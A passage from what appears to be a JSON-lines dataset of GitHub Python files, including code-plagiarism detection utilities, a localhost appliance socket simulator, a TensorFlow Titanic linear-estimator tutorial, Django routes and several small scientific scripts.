\"\"\"Given k and a list of indexes detected by\n find_fingerprint_overlap, generates a list of slices where the\n copied code begins and ends. Returns a 2D array where the first\n dimension is slice start locations and the second dimension is\n slice end locations.\n \"\"\"\n if len(idx) == 0:\n return np.array([[],[]])\n\n # determine the gaps between slices (called skips)\n sorted_idx = np.sort(idx)\n next_idx = np.concatenate([sorted_idx[1:], [0]])\n skips = np.where(next_idx - sorted_idx > k - 1)[0]\n\n # use the elements around the gaps to compute slice start/ends\n slice_starts = np.concatenate([[sorted_idx[0]], sorted_idx[skips + 1]])\n slice_ends = np.concatenate([sorted_idx[skips]+k, [sorted_idx[-1]+k]])\n\n return np.array([slice_starts, slice_ends])\n\ndef get_document_fingerprints(doc, k, window_size, boilerplate=None):\n \"\"\"Given a document, computes all k-gram hashes and uses the\n winnowing algorithm to reduce their number. Optionally takes a\n list of boilerplate hashes to remove from the winnowed list.\n Returns the selected hashes and their indexes in the original list\n \"\"\"\n if boilerplate is None:\n boilerplate = []\n all_hashes = hashed_kgrams(doc, k=k)\n hashes, idx = winnow(\n all_hashes, window_size=window_size, remove_duplicates=False\n )\n if len(boilerplate) > 0:\n _, overlap_idx, _ = np.intersect1d(hashes, boilerplate,\n return_indices=True,\n assume_unique=True)\n idx = np.delete(idx, overlap_idx)\n hashes = np.delete(hashes, overlap_idx)\n\n hash_dict = {}\n for hash_val, i in zip(hashes, idx):\n if hash_val not in hash_dict:\n hash_dict[hash_val] = [i]\n else:\n hash_dict[hash_val].append(i)\n return set(hashes), hash_dict\n\ndef find_fingerprint_overlap(hashes1, hashes2, idx1, idx2):\n \"\"\"Finds the indexes of overlapping values between two lists of\n hashes. Returns two lists of indexes, one for the first hash list\n and one for the second. The indexes of the original hashes are\n provided in case boilerplate results in gaps.\n \"\"\"\n intersection = hashes1.intersection(hashes2)\n if len(intersection) > 0:\n overlap_1 = np.concatenate([np.array(idx1[i]) for i in intersection])\n overlap_2 = np.concatenate([np.array(idx2[i]) for i in intersection])\n return overlap_1.flatten(), overlap_2.flatten()\n else:\n return np.array([], dtype=int), np.array([], dtype=int)\n\ndef highlight_overlap(doc, slices, left_hl, right_hl,\n truncate=-1, escape_html=False):\n \"\"\"Highlights copied code in a document given the slices containing\n copied code and strings to use for the highlight start and end.\n Returns the document annoted with the highlight strings as well as\n the percentage of code which was highlighted. 
If truncate is set to\n an integer, everything not within that many lines of highlighted\n code will be replaced with \"...\"\n \"\"\"\n if slices.shape[0] > 0:\n hl_percent = np.sum(slices[1] - slices[0])/len(doc)\n else:\n warnings.warn(\"empty slices array\")\n return doc, 0\n\n new_doc = \"\"\n current_idx = 0\n for slice_idx in range(slices.shape[1]):\n start_idx = slices[0,slice_idx]\n end_idx = slices[1,slice_idx]\n\n if escape_html:\n pre_highlight = str(escape(doc[current_idx:start_idx]))\n highlighted = left_hl+str(escape(doc[start_idx:end_idx]))+right_hl\n else:\n pre_highlight = doc[current_idx:start_idx]\n highlighted = left_hl + doc[start_idx:end_idx] + right_hl\n\n if truncate >= 0:\n lines = pre_highlight.split(\"\\n\")\n if slice_idx != 0 and len(lines) > truncate*2:\n pre_highlight = (\"\\n\".join(lines[:truncate+1]) + \"\\n\\n...\\n\\n\"\n + \"\\n\".join(lines[-truncate - 1:]))\n elif len(lines) > truncate:\n pre_highlight = \"\\n\".join(lines[-truncate - 1:])\n\n new_doc += pre_highlight + highlighted\n current_idx = end_idx\n\n if escape_html:\n post_highlight = str(escape(doc[current_idx:]))\n else:\n post_highlight = doc[current_idx:]\n\n if truncate >= 0:\n lines = post_highlight.split(\"\\n\")\n if len(lines) > truncate:\n post_highlight = \"\\n\".join(lines[:truncate])\n new_doc += post_highlight\n\n return new_doc, hl_percent\n\ndef get_token_coverage(idx: Dict[int, List[int]], k: int, token_len: int):\n \"\"\"Determines the number of tokens in the original document which\n are included in the winnowed indices\n \"\"\"\n if len(idx) > 0:\n idx_arr = np.concatenate([np.array(i) for i in idx.values()])\n else:\n idx_arr = np.array([], dtype=int)\n coverage = np.zeros(token_len)\n for offset in range(k):\n coverage[idx_arr + offset] = 1\n return np.sum(coverage)\n","repo_name":"blingenf/copydetect","sub_path":"copydetect/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9088,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"53"} +{"seq_id":"3591603244","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n#=============================================================================\n# FileName:\n# Desc:\n# Author: 白开水\n# Email: vekergu@163.com\n# HomePage: https://github.com/vekergu\n# Version: 0.0.1\n# LastChange: \n# History:\n#=============================================================================\nfrom __future__ import print_function\n'''\nProblem: the monkey-and-peaches puzzle. On the first day a monkey picks some peaches, immediately eats half of them and, still not satisfied, eats one more. On the second morning it eats half of the remaining peaches, plus one more. Every morning after that it eats half of what was left the previous day, plus one. On the morning of the 10th day, when it wants to eat again, only one peach is left. Find how many peaches were picked on the first day.\nProgram analysis: work backwards, reasoning from the last day to the first.\n\n1 3 5\nn*2 +1\n'''\n\nn = 1\nfor i in range(9,0,-1):\n n = (n+1)*2\n\nprint(n)","repo_name":"vekergu/ops_doc","sub_path":"learn_python/python练习100题/021_猴子吃桃.py","file_name":"021_猴子吃桃.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30169731293","text":"#! 
/usr/bin/env python\n#-----------------------------------------\n#\tSystem_Sim.py\n#\t\n#\tcs402: Making Appliances \"Self Aware\"\n#\t\n#\tJason Derrick (lead)\n#\tMark Bolles\n#\tTravis Brown\n#\tRyan Tungett\n#-----------------------------------------\n#\t\n#------------\n#\t\n#-----------------------------------------\nimport socket\nimport sys\nimport random\nimport re\nimport time\nfrom threading import Thread\n\n\n#=========================================\n#====== Global Variables (settings) ======\n\nRUN_SIM = True\nSIM_LENGTH = 1 # number of minutes simulation will run before ending\n\n\n#--Network connection\n# host = \"0.0.0.0\"\nhost = \"localhost\"\nport = 10000\nLISTENER = socket.socket()\nLISTENER.bind((host, port))\nTIMEOUT = 65.0\n\n#--System Info\nDevices = [] # list of connected appliances\nN_Appliances = 2 # target number of appliances (hardcoded for simplicity right now)\nhistory = {} # historical data, indexed on timestamp\n\n#------------ end of global variables ---------------------\n\n\n#=========================================\n#============= Classes =============\n\n\nclass Device():\n\tdef __init__(self, connection):\n\t\tself.connection = connection\n\t\tself.is_connected = True\n\t\tself.type = \"undetermined\"\n\t\tself.ID = \"dev00\"\n\t\tself.getInfo()\n\t\t\n\tdef recieveMessage(self):\n\t\t'''\n\t\tWrapper for socket.recv() for internal use (within class)\n\t\t'''\n\t\tmessage = \"\"\n\t\ttry:\n\t\t\tmessage = self.connection.recv(512).decode()\n\t\t\tif not message:\n\t\t\t\tself.is_connected = False\n\t\t\t\tprint(\"--empty recv--\")\n\t\t\t\t\n\t\texcept Exception as ex:\n\t\t\tself.is_connected = False\n\t\t\tself.connection.close()\n\t\t\ttemplate = \"An exception of type [{0}] occurred.\\nArguments:\\n {1!r}\"\n\t\t\tex_msg = template.format(type(ex).__name__, ex.args)\n\t\t\tprint(\"--><--\"*7)\n\t\t\tprint(ex_msg)\n\t\t\tprint(\"=-><-=\"*7)\n\t\t\tmessage = \"---EXCEPTION---\"\n\t\tmessage = message.rstrip(\"\\n\")\n\t\treturn message\n\t\t\n\tdef getInfo(self):\n\t\t'''\n\t\tRun during constructor to retrieve device information\n\t\t'''\n\t\tM = \"getInfo\"\n\t\tself.connection.send(M.encode()) #socket_send\n\t\tinfostring = self.recieveMessage()\n\t\t# info = infostring.split(str=\";\")\n\t\tinfo = infostring.split(\";\")\n\t\tself.type = info[0]\n\t\tself.ID = info[1]\n\t\tself.type = self.type.strip()\n\t\tself.ID = self.ID.strip()\n\t\treturn\n\t\t\n\tdef getData(self):\n\t\t'''\n\t\treceive message from Device,\n\t\treturn message as a string\n\t\t'''\n\t\tM = \"getData\"\n\t\tself.connection.send(M.encode()) #socket_send\n\t\tdatastring = self.recieveMessage()\n\t\t#--> should probably include some error checking here\n\t\treturn datastring.strip()\n#------------ end of Device() class -----------------------\n\n\nclass Snapshot():\n\tdef __init__(self, timestamp):\n\t\tself.time = timestamp\n\t\tself.data = {} # list/dict of recorded info at given timestamp\n\t\t\n\tdef add_data(self, Did, r):\n\t\tself.data[Did] = r # Did: Device ID, r: record (current state/power usage)\n\t\treturn\n\t\t\n\tdef __str__(self):\n\t\t'''format data as a string'''\n\t\tR = str(self.time)\n\t\tfor devID, rec in self.data.items():\n\t\t\tR += \" - {}:{}\".format(devID, rec)\n\t\treturn R\n\t\n\t\t\n#------------ end of class definition ---------------------\n\n\n#=========================================\n#============ Functions ============\n\ndef waitConnection():\n\t'''\n\tlisten for a client to connect, then accept connection\n\tReturn connected socket 
with a 60 sec timeout\n\treturn False if Exception occurred\n\t'''\n\t# TIMEOUT = 65.0\n\ttry:\n\t\tprint(\"..listening..\", end=\" \")\n\t\tLISTENER.settimeout(TIMEOUT)\n\t\tLISTENER.listen(5)\n\t\tprint(\" .. ..\")\n\t\tc, addr = LISTENER.accept()\n\t\tprint(\"__accepted__\")\n\texcept Exception as ex:\n\t\ttemplate = \"An exception of type [{0}] occurred.\\nArguments:\\n {1!r}\"\n\t\tex_msg = template.format(type(ex).__name__, ex.args)\n\t\tprint(\"--><--\"*7)\n\t\tprint(ex_msg)\n\t\tprint(\"=-><-=\"*7)\n\t\treturn False\n\tc.settimeout(TIMEOUT)\n\tprint(\"timeout set to {:02}s\".format(TIMEOUT))\n\treturn c\n\n\ndef my_send(sock, M):\n\t'''\n\twrapper for socket's send function\n\t\n\tCurrently just prints message before appending EOL\n\tCan be expanded to check syntax, etc\n\t'''\n\tprint(\"<<< [{}]\".format(M))\n\t\n\tif M == \"\":\n\t\tprint(\"--< (sending empty message...)\")\n\t\tM += \"\\n\"\n\telif M[-1] == \"\\n\":\n\t\tprint(\"--< already appended\")\n\telse:\n\t\tM += \"\\n\"\n\tsock.send(M.encode()) #socket_send\n\treturn\n\n\ndef tunnel(A, msg):\n\t'''receive msg from A, save info to database, send msg to all other connections'''\n\treturn\n#------------ end of function definition ------------------\n\n\n#=========================================\n#=========== begin MAIN ============\n\n#-----------------------------------------\n#- Connect to Appliances\nprint(\"\\n--------------------------------------------------\\n\")\nbackup = 0\nwhile len(Devices) < N_Appliances:\n\tbackup += 1\n\tif backup > (N_Appliances*2): break\n\t#-connect via waitConnection()\n\tconn_sock = waitConnection()\n\tif not conn_sock:\n\t\tprint(\"--no connection--\")\n\t\t#-device never connected\n\t\tcontinue\n\t\t\n\tnewDevice = Device(conn_sock)\n\t# newDevice.getInfo()\n\t#--> check Device.ID for uniqueness\n\t\n\tDevices.append(newDevice)\n\t\n\t#--> send list of currently connected appliances\n\t#--> send new connection info to currently connected appliances\n\t#--> ... actually, just let Device connect to Sim, and let Sim handle all communications\n\nprint(\"--------------------------------------------------\")\n\n\n#-----------------------------------------\n#- Run simulation\n\nminutes = 0\nwhile RUN_SIM:\n\tT = time.time()\n\ttmp_S = Snapshot(T)\n\t#-retrieve data from Devices\n\tfor D in Devices:\n\t\ttmp_S.add_data(D.ID, D.getData())\n\t\t#--> send data to each other Device\n\t#-save data\n\thistory[T] = tmp_S\n\tminutes += 1\n\tprint(\"saved data #{}\".format(minutes))\n\t\n\t#--> should modify RUN_SIM somewhere to prevent infinite loop...\n\tif minutes > SIM_LENGTH : break\n\ttime.sleep(6)\n\n#=========================================\n\n\n#-----------------------------------------\n#- Print results\n\nprint(\"--------------------------------------------------\")\nfor S in history:\n\tprint(history[S])\n\t\nprint(\"--------------------------------------------------\")\n\n\ntime.sleep(5)\nany_key = input(\"enter any key to exit\")\n\nprint(\"you chose the [{}] 'key'\".format(any_key))\n\n## end program\n\n\n\n#-----------------------------------------\n#- ToDo\n'''\n\nadd print() function for history{} ... 
and somewhere in the program to print/record the data\n\n\nnotes:\n- the record/snapshot/whatever data is being stored could use some consistency, if not some improvement.\n\n\n'''\n\n\n","repo_name":"tbrown5238/cs402-team5","sub_path":"rough_sketch_v0/System_Sim.py","file_name":"System_Sim.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"958954000","text":"import numpy as np\nimport matplotlib.pylab as mpl\nfrom scipy.integrate import odeint\nimport sys\n\ndef s(x, z, omega_m, omega_k, Lambda):\n\ts = x[0]\n\tdsdz = np.sqrt(omega_m*(1 + z)**3 + omega_k*(1 + z)**2 + Lambda)/np.sqrt(omega_m*(1 + z)*(1./s) + omega_k + Lambda*s**2/(1 + z)**2)\n\n\treturn dsdz\n\n\ndef s_a(x, a, omega_m, omega_k, Lambda, a0):\n\ts = x[0]\n\tdsda = np.sqrt(omega_m/a0**3/s + omega_k/a0**2 + Lambda/3.*s**2)/np.sqrt(a**2*(omega_m/a**3 + omega_k/a**2 + Lambda/3.))\n\n\treturn dsda\n\nN = 10000\na0 = 1.65e-5\n\nz = np.linspace(20, 0, N)\n\na = np.linspace(a0, 1, N)\n\nLambda = float(sys.argv[1])\n\nOmega_m0_min = 1.0\nOmega_m0_max = float(sys.argv[2])\nn=11\n\nOmega_m0 = np.linspace(Omega_m0_min, Omega_m0_max, n)\n\nif len(sys.argv) == 3:\n\tOmega_K = 1 - Omega_m0 - Lambda\nelse:\n\tOmega_K = np.zeros(n)\n\tfor j in range(n):\n\t\tOmega_K[j] = float(sys.argv[3])\n\nomega = Omega_K + Omega_m0 + Lambda\n\ns0 = 0.5\n\n#result = odeint(s, s0, z, args=(Lambda, Omega_m0, Omega_K))\n\n\nfor i in range(len(Omega_m0)):\n\tsofa = odeint(s_a, s0, a, args = (Omega_m0[i], Omega_K[i], Lambda, a0))\n\n\tmpl.plot(a, sofa, linewidth = 0.75, label = r\"s, $\\Omega_{m0} =$ %.1f\" % Omega_m0[i])\n\tmpl.xlabel(\"a(t)\")\n\tmpl.ylabel(\"s(a)\")\n\tmpl.legend()\n\tmpl.yscale(\"log\")\n\tmpl.xscale(\"log\")\n\n\nmpl.show()","repo_name":"mrnafstad/Master","sub_path":"Kode/2DEradius.py","file_name":"2DEradius.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17657500325","text":"from soxs.background import \\\n BackgroundSpectrum, \\\n ConvolvedBackgroundSpectrum, \\\n make_point_sources_file, \\\n make_point_source_list, \\\n InstrumentalBackground\n\nfrom soxs.cosmology import \\\n make_cosmological_sources_file\n\nfrom soxs.events import \\\n write_spectrum, \\\n write_image, \\\n write_radial_profile, \\\n plot_spectrum, \\\n make_exposure_map, \\\n plot_image\n\nfrom soxs.instrument import \\\n instrument_simulator, \\\n make_background_file, \\\n simulate_spectrum\n\nfrom soxs.instrument_registry import \\\n add_instrument_to_registry, \\\n show_instrument_registry, \\\n write_instrument_json, \\\n get_instrument_from_registry, \\\n instrument_registry, \\\n make_simple_instrument\n\nfrom soxs.mosaic import \\\n make_mosaic_events, \\\n make_mosaic_image\n\nfrom soxs.response import \\\n AuxiliaryResponseFile, \\\n RedistributionMatrixFile, \\\n FlatResponse\n\nfrom soxs.simput import \\\n read_simput_catalog, \\\n SimputPhotonList, \\\n SimputCatalog, \\\n SimputSpectrum, \\\n write_photon_list\n\nfrom soxs.spatial import \\\n PointSourceModel, \\\n RadialFunctionModel, \\\n RadialArrayModel, \\\n RadialFileModel, \\\n AnnulusModel, \\\n BetaModel, \\\n DoubleBetaModel, \\\n FillFOVModel, \\\n RectangleModel, \\\n SpatialModel\n\nfrom soxs.spectra import \\\n Spectrum, \\\n ApecGenerator, \\\n ConvolvedSpectrum\n\nfrom soxs.utils import soxs_cfg\n\n__version__ = 
\"3.0.2\"","repo_name":"daya135k/jzuhonev","sub_path":"soxs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4767652477","text":"from argparse import ArgumentParser\n\n\nclass ArgsParserType(object):\n MODEL_TRAINING = \"training\"\n\n\nclass ArgsParserFactory(object):\n\n @staticmethod\n def create_parser(parser_type):\n parser = ArgumentParser(description='DeepNormalize Training')\n parser.add_argument(\"--use-amp\", dest=\"use_amp\", action=\"store_true\", default=False)\n parser.add_argument(\"--amp-opt-level\", dest=\"amp_opt_level\", type=str, default=\"O1\",\n help=\"O0 - FP32 training, O1 - Mixed Precision (recommended), O2 - Almost FP16 Mixed Precision, O3 - FP16 Training.\")\n parser.add_argument(\"--num-workers\", dest=\"num_workers\", default=4, type=int,\n help=\"Number of data loading workers for each dataloader object (default: 2).\")\n parser.add_argument(\"--local_rank\", dest=\"local_rank\", default=0, type=int, help=\"The local_rank of the GPU.\")\n\n if parser_type is ArgsParserType.MODEL_TRAINING:\n parser.add_argument(\"--config-file\", dest=\"config_file\", required=True)\n return parser\n","repo_name":"sami-ets/DeepNormalize","sub_path":"deepNormalize/config/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3719582681","text":"from django.contrib import admin\nfrom django.urls import path\nfrom mywed import views\n\n\nurlpatterns = [\n\n path('', views.index, name='index'),\n path('index_user', views.index_user, name='index_user'),\n path('admin/', admin.site.urls),\n path('animal', views.animal, name='animal'),\n path('animal_user', views.animal_user, name='animal_user'),\n path('add_animal', views.add_animal, name='add_animal'),\n path('login', views.login_user, name='login'),\n path('logout', views.logout_user, name='logout'),\n path('register', views.register, name='register'),\n path('allanimal',views.allanimal, name='allanimal'),\n\n #path('Upload', views.Upload),\n]\n","repo_name":"Tanung/pythonanywhere","sub_path":"Mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36759034194","text":"'''\n------------------------------------------------------------------------------------------\nestimator\n Build a linear model with Estimators\n\nOverview\nThis end-to-end walkthrough trains a logistic regression model using the tf.estimator API. 
\nThe model is often used as a baseline for other, more complex, algorithms.\n------------------------------------------------------------------------------------------\n'''\n# common library\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport time\nimport os\nimport sys\nimport platform\nimport shutil\nimport subprocess\nimport random\nimport datetime\nfrom pathlib import Path\nfrom packaging import version\nfrom PIL import Image\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import roc_curve\n\nimport tensorflow as tf\n\nprint(__doc__)\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\npd.options.display.max_rows = None\n\n# Display current path\nbasic_path = Path.cwd()\nPROJECT_ROOT_DIR = basic_path.joinpath('Python', 'Normal', 'tensorflow')\nprint('PROJECT_ROOT_DIR = \\n{0}\\n'.format(PROJECT_ROOT_DIR))\n\n# Display tensorflow version\nprint(\"TensorFlow version: \", tf.version.VERSION)\nassert version.parse(tf.version.VERSION).release[0] >= 2, \\\n\"This notebook requires TensorFlow 2.0 or above.\"\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Load the titanic dataset \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n--------------------------------------------------------------------------------------------------------------\nYou will use the Titanic dataset with the (rather morbid) goal of predicting passenger survival, given characteristics \nsuch as gender, age, class, etc.\n--------------------------------------------------------------------------------------------------------------\n'''\n\n# Load dataset.\ndftrain = pd.read_csv('https://storage.googleapis.com/tf-datasets/titanic/train.csv')\ndfeval = pd.read_csv('https://storage.googleapis.com/tf-datasets/titanic/eval.csv')\ny_train = dftrain.pop('survived')\ny_eval = dfeval.pop('survived')\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Explore the titanic dataset \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n---------------------------------------------------------------------------------------------------------------\nThe dataset contains the following features\n---------------------------------------------------------------------------------------------------------------\n'''\n\nprint('dftrain.head() = \\n{0}\\n'.format(dftrain.head()))\n\nprint('dftrain.describe() = \\n{0}\\n'.format(dftrain.describe()))\n\n'''\n--------------------------------------------------------------------------------------------------------------\nThere are 627 and 264 examples in the training and evaluation sets, respectively.\n--------------------------------------------------------------------------------------------------------------\n'''\n\nprint('(dftrain.shape[0] = {0}, dfeval.shape[0] = {1})\\n'.format(dftrain.shape[0], dfeval.shape[0]))\n\n# The majority of passengers are in their 20's and 30's.\ndftrain.age.hist(bins=20)\nplt.show()\n\n# There are approximately twice as many male passengers as female passengers aboard.\ndftrain.sex.value_counts().plot(kind='barh')\nplt.show()\n\n# The majority of passengers were in the \"third\" class.\ndftrain['class'].value_counts().plot(kind='barh')\nplt.show()\n\n# Females have a 
much higher chance of surviving versus males. \n# This is clearly a predictive feature for the model.\npd.concat([dftrain, y_train], axis=1).groupby('sex').survived.mean().plot(kind='barh').set_xlabel('% survive')\nplt.show()\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Feature Engineering for the Model \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n---------------------------------------------------------------------------------------------------------------\nEstimators use a system called feature columns to describe how the model should interpret each of the raw input features. \nAn Estimator expects a vector of numeric inputs, and feature columns describe how the model should convert each feature.\n\nSelecting and crafting the right set of feature columns is key to learning an effective model. \nA feature column can be either one of the raw inputs in the original features dict (a base feature column), \nor any new column created using transformations defined over one or multiple base columns (a derived feature column).\n\nThe linear estimator uses both numeric and categorical features. \nFeature columns work with all TensorFlow estimators and their purpose is to define the features used for modeling. \nAdditionally, they provide some feature engineering capabilities like one-hot-encoding, normalization, and bucketization.\n---------------------------------------------------------------------------------------------------------------\n'''\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Base Feature Columns \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\nCATEGORICAL_COLUMNS = ['sex', 'n_siblings_spouses', 'parch', 'class', 'deck', 'embark_town', 'alone']\nNUMERIC_COLUMNS = ['age', 'fare']\n\nfeature_columns = []\nfor feature_name in CATEGORICAL_COLUMNS:\n vocabulary = dftrain[feature_name].unique()\n feature_columns.append(tf.feature_column.categorical_column_with_vocabulary_list(feature_name, vocabulary))\n\nfor feature_name in NUMERIC_COLUMNS:\n feature_columns.append(tf.feature_column.numeric_column(feature_name, dtype=tf.float32))\n\n'''\n---------------------------------------------------------------------------------------------------------------\nThe input_function specifies how data is converted to a tf.data.Dataset that feeds the input pipeline in a streaming fashion. 
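Estimators expect the input as a zero-argument callable that returns the Dataset, which is why make_input_fn below returns the inner input_function rather than calling it. 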
\ntf.data.Dataset can take in multiple sources such as a dataframe, a csv-formatted file, and more.\n---------------------------------------------------------------------------------------------------------------\n'''\n\ndef make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):\n def input_function():\n ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df))\n if shuffle:\n ds = ds.shuffle(1000)\n \n ds = ds.batch(batch_size).repeat(num_epochs)\n return ds\n return input_function\n\ntrain_input_fn = make_input_fn(dftrain, y_train)\neval_input_fn = make_input_fn(dfeval, y_eval, num_epochs=1, shuffle=False)\n\n# You can inspect the dataset:\nds = make_input_fn(dftrain, y_train, batch_size=10)()\nfor feature_batch, label_batch in ds.take(1):\n print('Some feature keys:', list(feature_batch.keys()))\n print()\n print('A batch of class:', feature_batch['class'].numpy())\n print()\n print('A batch of Labels:', label_batch.numpy())\n\n# You can also inspect the result of a specific feature column using the tf.keras.layers.DenseFeatures layer:\nage_column = feature_columns[7]\ntf.keras.layers.DenseFeatures([age_column])(feature_batch).numpy()\n\n'''\n------------------------------------------------------------------------------------------------------------\nDenseFeatures only accepts dense tensors, \nto inspect a categorical column you need to transform that to an indicator column first:\n------------------------------------------------------------------------------------------------------------\n'''\ngender_column = feature_columns[0]\ntf.keras.layers.DenseFeatures([tf.feature_column.indicator_column(gender_column)])(feature_batch).numpy()\n\n# After adding all the base features to the model, let's train the model. \n# Training a model is just a single command using the tf.estimator API:\nlinear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns)\nlinear_est.train(train_input_fn)\nresult = linear_est.evaluate(eval_input_fn)\n\nprint(result)\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Derived Feature Columns \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n---------------------------------------------------------------------------------------------------------------\nNow you have reached an accuracy of 75%. \nUsing each base feature column separately may not be enough to explain the data. \nFor example, the correlation between gender and the label may be different for different genders. \nTherefore, if you only learn a single model weight for gender=\"Male\" and gender=\"Female\", \nyou won't capture every age-gender combination \n(e.g. 
distinguishing between gender=\"Male\" AND age=\"30\" AND gender=\"Male\" AND age=\"40\").\n\nTo learn the differences between different feature combinations, \nyou can add crossed feature columns to the model (you can also bucketize the age column before the cross column):\n---------------------------------------------------------------------------------------------------------------\n'''\n\nage_x_gender = tf.feature_column.crossed_column(['age', 'sex'], hash_bucket_size=100)\n\n# After adding the combination feature to the model, let's train the model again:\nderived_feature_columns = [age_x_gender]\nlinear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns+derived_feature_columns)\nlinear_est.train(train_input_fn)\nresult = linear_est.evaluate(eval_input_fn)\n\nprint(result)\n\n'''\n--------------------------------------------------------------------------------------------------------------\nIt now achieves an accuracy of 77.6%, which is slightly better than the model trained on base features only. \nYou can try using more features and transformations to see if you can do better!\n\nNow you can use the trained model to make predictions on a passenger from the evaluation set. \nTensorFlow models are optimized to make predictions on a batch, or collection, of examples at once. \nEarlier, the eval_input_fn was defined using the entire evaluation set.\n--------------------------------------------------------------------------------------------------------------\n'''\n\npred_dicts = list(linear_est.predict(eval_input_fn))\nprobs = pd.Series([pred['probabilities'][1] for pred in pred_dicts])\n\nprobs.plot(kind='hist', bins=20, title='predicted probabilities')\nplt.show()\n\n'''\n-------------------------------------------------------------------------------------------------------------\nFinally, look at the receiver operating characteristic (ROC) of the results, \nwhich will give us a better idea of the tradeoff between the true positive rate and false positive rate.\n-------------------------------------------------------------------------------------------------------------\n'''\n\nfpr, tpr, _ = roc_curve(y_eval, probs)\nplt.plot(fpr, tpr)\nplt.title('ROC curve')\nplt.xlabel('false positive rate')\nplt.ylabel('true positive rate')\nplt.xlim(0,)\nplt.ylim(0,)\nplt.show()\n\ndata_today = datetime.date.today()\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\nprint(\n ' finished estimator_linear_model.py ({0}) \\n'.format(data_today)\n )\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n )\nprint()\nprint()\nprint()","repo_name":"munezou/VsCodeProject","sub_path":"Python/Normal/tensorflow/estimator_linear_model.py","file_name":"estimator_linear_model.py","file_ext":"py","file_size_in_byte":12300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18753715674","text":"import argparse\nfrom pathlib import Path\n\nimport pose_detector.generation.generator as generator\nimport pose_detector.training.training as training\nimport pose_detector.benchmark.benchmark as benchmark\nimport pose_detector.serving.serving as serving\nimport pose_detector.utility.utility as utility\n\n\ndef main():\n \"\"\"The entry point of pose-detector\n \"\"\"\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n datagen_parser = subparsers.add_parser(\"generate\",\n help=\"Create a 
dataset by rendering images using blender and applying post processing\",\n description=\"\"\"Create a dataset by rendering images using blender and \n applying post processing.\n \n The Blenderproc pipeline is used to simplify and speed up the rendering \n process in Blender. A config file for this tool must be provided. This \n tool needs some specific Blenderproc modules to achieve the correct output \n for further processing. It is highly recommended to use the provided \n config template file `resources/template.yaml`. \n\n By adding modules to the config you can modify the rendered images in any \n way you want.\"\"\")\n datagen_parser.add_argument(\"config_path\", type=Path, metavar=\"config\",\n help=\"Path to the configuration file for BlenderProc\")\n datagen_parser.add_argument(\"models_path\", type=Path, metavar=\"models\",\n help=\"Path to the directory containing the models as individual .blend files\")\n datagen_parser.add_argument(\"backgrounds_path\", type=Path, metavar=\"backgrounds\",\n help=\"Path of the directory containing background images\")\n datagen_parser.add_argument(\"output_path\", type=Path, metavar=\"output\",\n help=\"Path to the directory where the images should be stored\")\n datagen_parser.add_argument(\"--mode\", type=str, default=\"all\", choices=[\"all\", \"render\", \"process\"],\n help=\"Only perform one step of the generation\")\n datagen_parser.add_argument(\"--size\", \"-s\", type=int, default=10,\n help=\"The target size of the dataset to be generated, this might vary by a few images \"\n \"depending on the number of models and parallelization\")\n datagen_parser.add_argument(\"--parallel\", \"-p\", type=int, default=1,\n help=\"How many processes to use in parallel for rendering the images\")\n datagen_parser.set_defaults(func=generator.generate_dataset)\n\n train_parser = subparsers.add_parser(\"train\",\n help=\"Train a CNN using a previously created dataset.\",\n description=\"\"\"Train a CNN using a previously created dataset.\n \n This uses transfer learning on the `resnet18` model pretrained on the \n `imagenet` dataset. It tries to predict the value encoded in the image name \n created by the generation step. 
